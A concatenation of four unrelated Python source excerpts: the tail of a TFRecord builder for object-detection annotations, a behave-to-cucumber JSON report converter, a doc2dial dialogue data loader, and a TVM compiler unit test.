filename.encode('utf8')])),
'image/key/sha256': tf.train.Feature(bytes_list=tf.train.BytesList(value=[key.encode('utf8')])),
'image/encoded': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw])),
'image/format': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_format.encode('utf8')])),
}))
else:
for obj in annotation:
if 'MultiPolygon' == obj['geometry']['type']:
logging.warning("Multi-polygon type")
return None
_xmin, _ymin, _xmax, _ymax = _get_bbox(obj['geometry']['coordinates'],
height, width)
xmin.append(_xmin)
ymin.append(_ymin)
xmax.append(_xmax)
ymax.append(_ymax)
if 'classification' in obj['properties']:
classes_text.append(obj['properties']['classification']['name']
.encode('utf8'))
classes.append(
class_map[obj['properties']['classification']['name']])
else:
classes_text.append(str('UNKNOWN').encode('utf8'))
classes.append(class_map['UNKNOWN'])
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': tf.train.Feature(int64_list=tf.train.Int64List(value=[height])),
'image/width': tf.train.Feature(int64_list=tf.train.Int64List(value=[width])),
'image/filename': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
filename.encode('utf8')])),
'image/source_id': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
filename.encode('utf8')])),
'image/key/sha256': tf.train.Feature(bytes_list=tf.train.BytesList(value=[key.encode('utf8')])),
'image/encoded': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw])),
'image/format': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_format.encode('utf8')])),
'image/object/bbox/xmin': tf.train.Feature(float_list=tf.train.FloatList(value=xmin)),
'image/object/bbox/xmax': tf.train.Feature(float_list=tf.train.FloatList(value=xmax)),
'image/object/bbox/ymin': tf.train.Feature(float_list=tf.train.FloatList(value=ymin)),
'image/object/bbox/ymax': tf.train.Feature(float_list=tf.train.FloatList(value=ymax)),
'image/object/class/text': tf.train.Feature(bytes_list=tf.train.BytesList(value=classes_text)),
'image/object/class/label': tf.train.Feature(int64_list=tf.train.Int64List(value=classes)),
}))
return example
def main(_argv):
logging.info("===== Start create tfrecord =====")
# log level
if 'debug' == FLAGS.log_level:
logging.set_verbosity(logging.DEBUG)
else:
logging.set_verbosity(logging.INFO)
# get class names
class_map = {name: idx for idx, name in enumerate(
open(FLAGS.classes).read().splitlines())}
logging.info("Class mapping loaded: %s", class_map)
# get IMAGE files
base_dir = os.path.abspath("./")
subset = ["train", "val", "test"]
out_name = os.path.splitext(FLAGS.output_file)[0]
out_format = os.path.splitext(FLAGS.output_file)[1]
for item in subset:
result_name = "{}-{}{}".format(out_name, item, out_format)
logging.info("output file: %s", result_name)
# open tfrecord file
writer = tf.io.TFRecordWriter(result_name)
dataset_dir = os.path.join(base_dir, FLAGS.data_dir, item)
logging.info("dataset path: %s", dataset_dir)
dataset_list = [f for f in listdir(dataset_dir)
if f.endswith(".jpg") or f.endswith(".png")]
logging.info("Image list loaded: %d", len(dataset_list))
logging.debug("Image list loaded: {}".format(dataset_list))
for name in tqdm.tqdm(dataset_list):
filename = os.path.splitext(name)[0]
img_format = os.path.splitext(name)[1]
if "test" == item:
annotation = None
else:
annotation = json.load(open(os.path.join(dataset_dir, (filename+'.json'))))
tf_example = build_example(item, annotation, dataset_dir, filename,
img_format, class_map)
if tf_example is not None:
writer.write(tf_example.SerializeToString())
writer.close()
logging.info("===== Done =====")
# TODO: optionally emit a summary report of how many examples were written per subset.
if __name__ == '__main__':
app.run(main)
|
'''
Copyright (c) 2016 Behalf Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
def convert(json_file, remove_background=False, duration_format=False, deduplicate=False, pretty_step_name=False):
# json_nodes are the scopes available in behave/cucumber json: Feature -> elements (Scenarios) -> Steps
json_nodes = ['feature', 'elements', 'steps']
# These fields don't exist in the cucumber report, so they must be deleted when converting from behave.
fields_not_exist_in_cucumber_json = ['status', 'step_type']
def format_level(tree, index=0, id_counter=0):
for item in tree:
# Location in behave json translates to uri and line in cucumber json
uri, line_number = item.pop("location").split(":")
item["line"] = int(line_number)
for field in fields_not_exist_in_cucumber_json:
if field in item:
item.pop(field)
if 'tags' in item:
# Tags in behave are just a list of tag names, in cucumber every tag has a name and a line number.
item['tags'] = [{"name": tag if tag.startswith('@') else '@' + tag, "line": item["line"] - 1} for tag in
item['tags']]
if json_nodes[index] == 'steps':
if 'result' in item:
# Long error messages cause problems downstream, so the message is truncated to at most 2000 characters.
if 'error_message' in item["result"]:
error_msg = item["result"].pop('error_message')
item["result"]["error_message"] = str(
(str(error_msg).replace("\"", "").replace("\\'", ""))[:2000])
if 'duration' in item["result"] and duration_format:
item["result"]["duration"] = int(item["result"]["duration"] * 1000000000)
else:
# In behave, skipped tests don't have a result object in their json, so when generating the
# Cucumber report we create a new result with status "skipped" for every skipped test.
item["result"] = {"status": "skipped", "duration": 0}
if 'table' in item:
item['rows'] = []
t_line = 1
item['rows'].append({"cells": item['table']['headings'], "line": item["line"] + t_line})
for table_row in item['table']['rows']:
t_line += 1
item['rows'].append({"cells": table_row, "line": item["line"] + t_line})
if pretty_step_name and 'match' in item:
item['match']['location'] = f"{item['name']} -> {item['match']['location']}"
else:
# uri is the name of the feature file the current item located
item["uri"] = uri
item["description"] = ""
item["id"] = id_counter
id_counter += 1
# If the scope is not "steps" proceed with the recursion
if index != 2 and json_nodes[index + 1] in item:
item[json_nodes[index + 1]] = format_level(
item[json_nodes[index + 1]], index + 1, id_counter=id_counter
)
return tree
# Option to remove the background element, because behave already pushes its steps into all scenarios
if remove_background:
for feature in json_file:
if feature['elements'][0]['type'] == 'background':
feature['elements'].pop(0)
if deduplicate:
def check_dupe(current_feature, current_scenario, previous_scenario):
if "autoretry" not in current_feature['tags'] and "autoretry" not in current_scenario['tags']:
return False
return \
previous_scenario['keyword'] == current_scenario['keyword'] and \
previous_scenario['location'] == current_scenario['location'] and \
previous_scenario['name'] == current_scenario['name'] and \
previous_scenario['tags'] == current_scenario['tags'] and \
previous_scenario['type'] == current_scenario['type']
for feature in json_file:
# Create a working list
scenarios = []
# For each scenario in the feature
for scenario in feature['elements']:
# Append the scenario to the working list
scenarios.append(scenario)
# Check the previous scenario
try:
# See if the previous scenario exists and matches
previous_scenario = scenarios[-2]
if check_dupe(feature, scenario, previous_scenario):
# Remove the earlier scenario from the working list
scenarios.pop(-2)
except IndexError:
# If we're at the beginning of the list, don't do anything
pass
# Replace the existing list with the working list
feature['elements'] = scenarios
# Begin the recursion
return format_level(json_file)
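# Usage sketch (hypothetical file names, not part of the original module): convert a behave
# JSON report into a cucumber-style report that cucumber reporting tools can consume.
if __name__ == "__main__":
    import json

    with open("behave-report.json") as behave_file:
        behave_json = json.load(behave_file)
    cucumber_json = convert(behave_json, remove_background=True, duration_format=True)
    with open("cucumber-report.json", "w") as cucumber_file:
        json.dump(cucumber_json, cucumber_file, indent=2)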
|
import json
import os
import argparse
from collections import defaultdict
from datasets import load_dataset
DOC_DOMAIN_SPLIT = "train"
YOUR_DATASETS_SOURCE_DIR = "" # the root folder of your local `datasets` source code.
END_TOKENS = ['.', '!', '?', '...', "'", "`", '"', ")"] # acceptable ways to end a sentence
def fix_missing_period(line):
"""Adds a period to a line that is missing a period"""
if line == "": return line
if line[-1] in END_TOKENS: return line
return line + " ."
def text2line(text):
return text.replace("\n", "").replace("\r", "").strip()
def _parse_knowledge(kns: list, correct_first: bool, ground_id: list):
# The knowledge sentences keep their original order unless correct_first is set, in which
# case the grounded (correct) spans are moved to the front of the list; there can be
# multiple references per turn.
ground_id.sort()
if correct_first:
anchor = 0
for i in ground_id:
i = int(i) - 1
kns[anchor], kns[i] = kns[i], kns[anchor]
anchor += 1
return kns
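# Example (hypothetical): with kns = ["s1", "s2", "s3", "s4"] and ground_id = ["2", "4"],
# correct_first=True swaps the grounded spans to the front, yielding ["s2", "s4", "s3", "s1"];
# with correct_first=False the list is returned unchanged. Note that kns is modified in place.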
def load_dataset_from_file(filename):
# read the data file
with open(filename, "r") as f:
data = json.load(f)
dial_dataset = []
for _, domain_data in data.items():
for _, v in domain_data.items():
dial_dataset.extend(v)
return dial_dataset
def load_doc2dial_seq2seq(args, correct_first=False, keep_last_n=2, grounding=False):
doc_dataset = load_dataset("../dialdoc", name="document_domain", split=DOC_DOMAIN_SPLIT) # path to your datasets source code
if args.split == "testdev" or args.split == "test":
dial_dataset = load_dataset_from_file(args.in_file)
else:
dial_dataset = load_dataset( "../dialdoc", name="dialogue_domain", split=args.split, ignore_verifications=True)
d_doc = {}
d_doc_span = {}
for ex in doc_dataset:
d_doc[ex["doc_id"]] = []
d_doc_span[ex["doc_id"]] = {}
for d_span in ex["spans"]:
# id: d_span["id_sp"]
d_doc_span[ex["doc_id"]][d_span["id_sp"]] = d_span["text_sp"].replace("\n", "")
d_doc[ex["doc_id"]].append(d_span["text_sp"].replace("\n", ""))
for ex in dial_dataset:
history_strings = []
users = []
for i, turn in enumerate(ex["turns"]):
if not turn.get("references", None):  # this task only uses and evaluates on grounded turns
if "test" not in args.split:
continue
else:  # we are in the test set, where references are missing by default
turn["references"] = [{"sp_id": 0}]
ground_id = []
for ref in turn["references"]:
ground_id.append(ref["sp_id"])
utterance = fix_missing_period(text2line(turn["utterance"]))
if turn["role"] == "agent":
users.append(1)
elif turn["role"] == "user":
users.append(0)
else:
raise ValueError("Invalid role!")
history_strings.append(utterance)
if turn["role"] == "agent" and "test" not in args.split:
knowledge = _parse_knowledge(d_doc[ex["doc_id"]], correct_first, ground_id)
label = utterance
yield (history_strings[-(keep_last_n+1):-1], users[-(keep_last_n+1):-1], label, knowledge)
if "test" in args.split:
knowledge = _parse_knowledge(d_doc[ex["doc_id"]], correct_first, ground_id)
_id = ex["dial_id"] + "_" + str(turn["turn_id"])
yield (history_strings[-keep_last_n:], users[-keep_last_n:], _id, knowledge)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Pre-training for Knowledge-Grounded Conversation'
)
parser.add_argument('--in_file', type=str, default='')
parser.add_argument('--out_file', type=str, default='')
parser.add_argument(
"--split",
type=str,
required=True,
help="Data split is 'train', 'validation' or 'test'",
)
args = parser.parse_args()
with open(args.out_file, 'w', encoding='utf-8') as f:
for history, user, response, knowledge in load_doc2dial_seq2seq(args, correct_first=True, keep_last_n=2):
f.write(
json.dumps({
'history': history,
'user': user,
'response': response,
'knowledge': knowledge
}) + '\n'
)
|
import tvm
def test_rewrite_Select():
ib = tvm.ir_builder.create()
A = ib.allocate("float32", 100, name="A", scope="global")
i = tvm.var("i")
y = tvm.expr.Select(i > 1, A[i-1], 1.0)
yy = tvm.ir_pass.RewriteUnsafeSelect(tvm.make.Evaluate(y)).value
z = tvm.expr.Select(
tvm.expr.Select(i > 1, A[i-1], 1.0) > 0.0, A[i], 0.1)
zz = tvm.ir_pass.RewriteUnsafeSelect(tvm.make.Evaluate(z)).value
a = tvm.expr.Select(i>10, y, z)
aa = tvm.ir_pass.RewriteUnsafeSelect(tvm.make.Evaluate(a)).value
assert yy.name == "tvm_if_then_else"
assert zz.name == "tvm_if_then_else"
assert isinstance(aa, tvm.expr.Select)
if __name__ == "__main__":
test_rewrite_Select()
|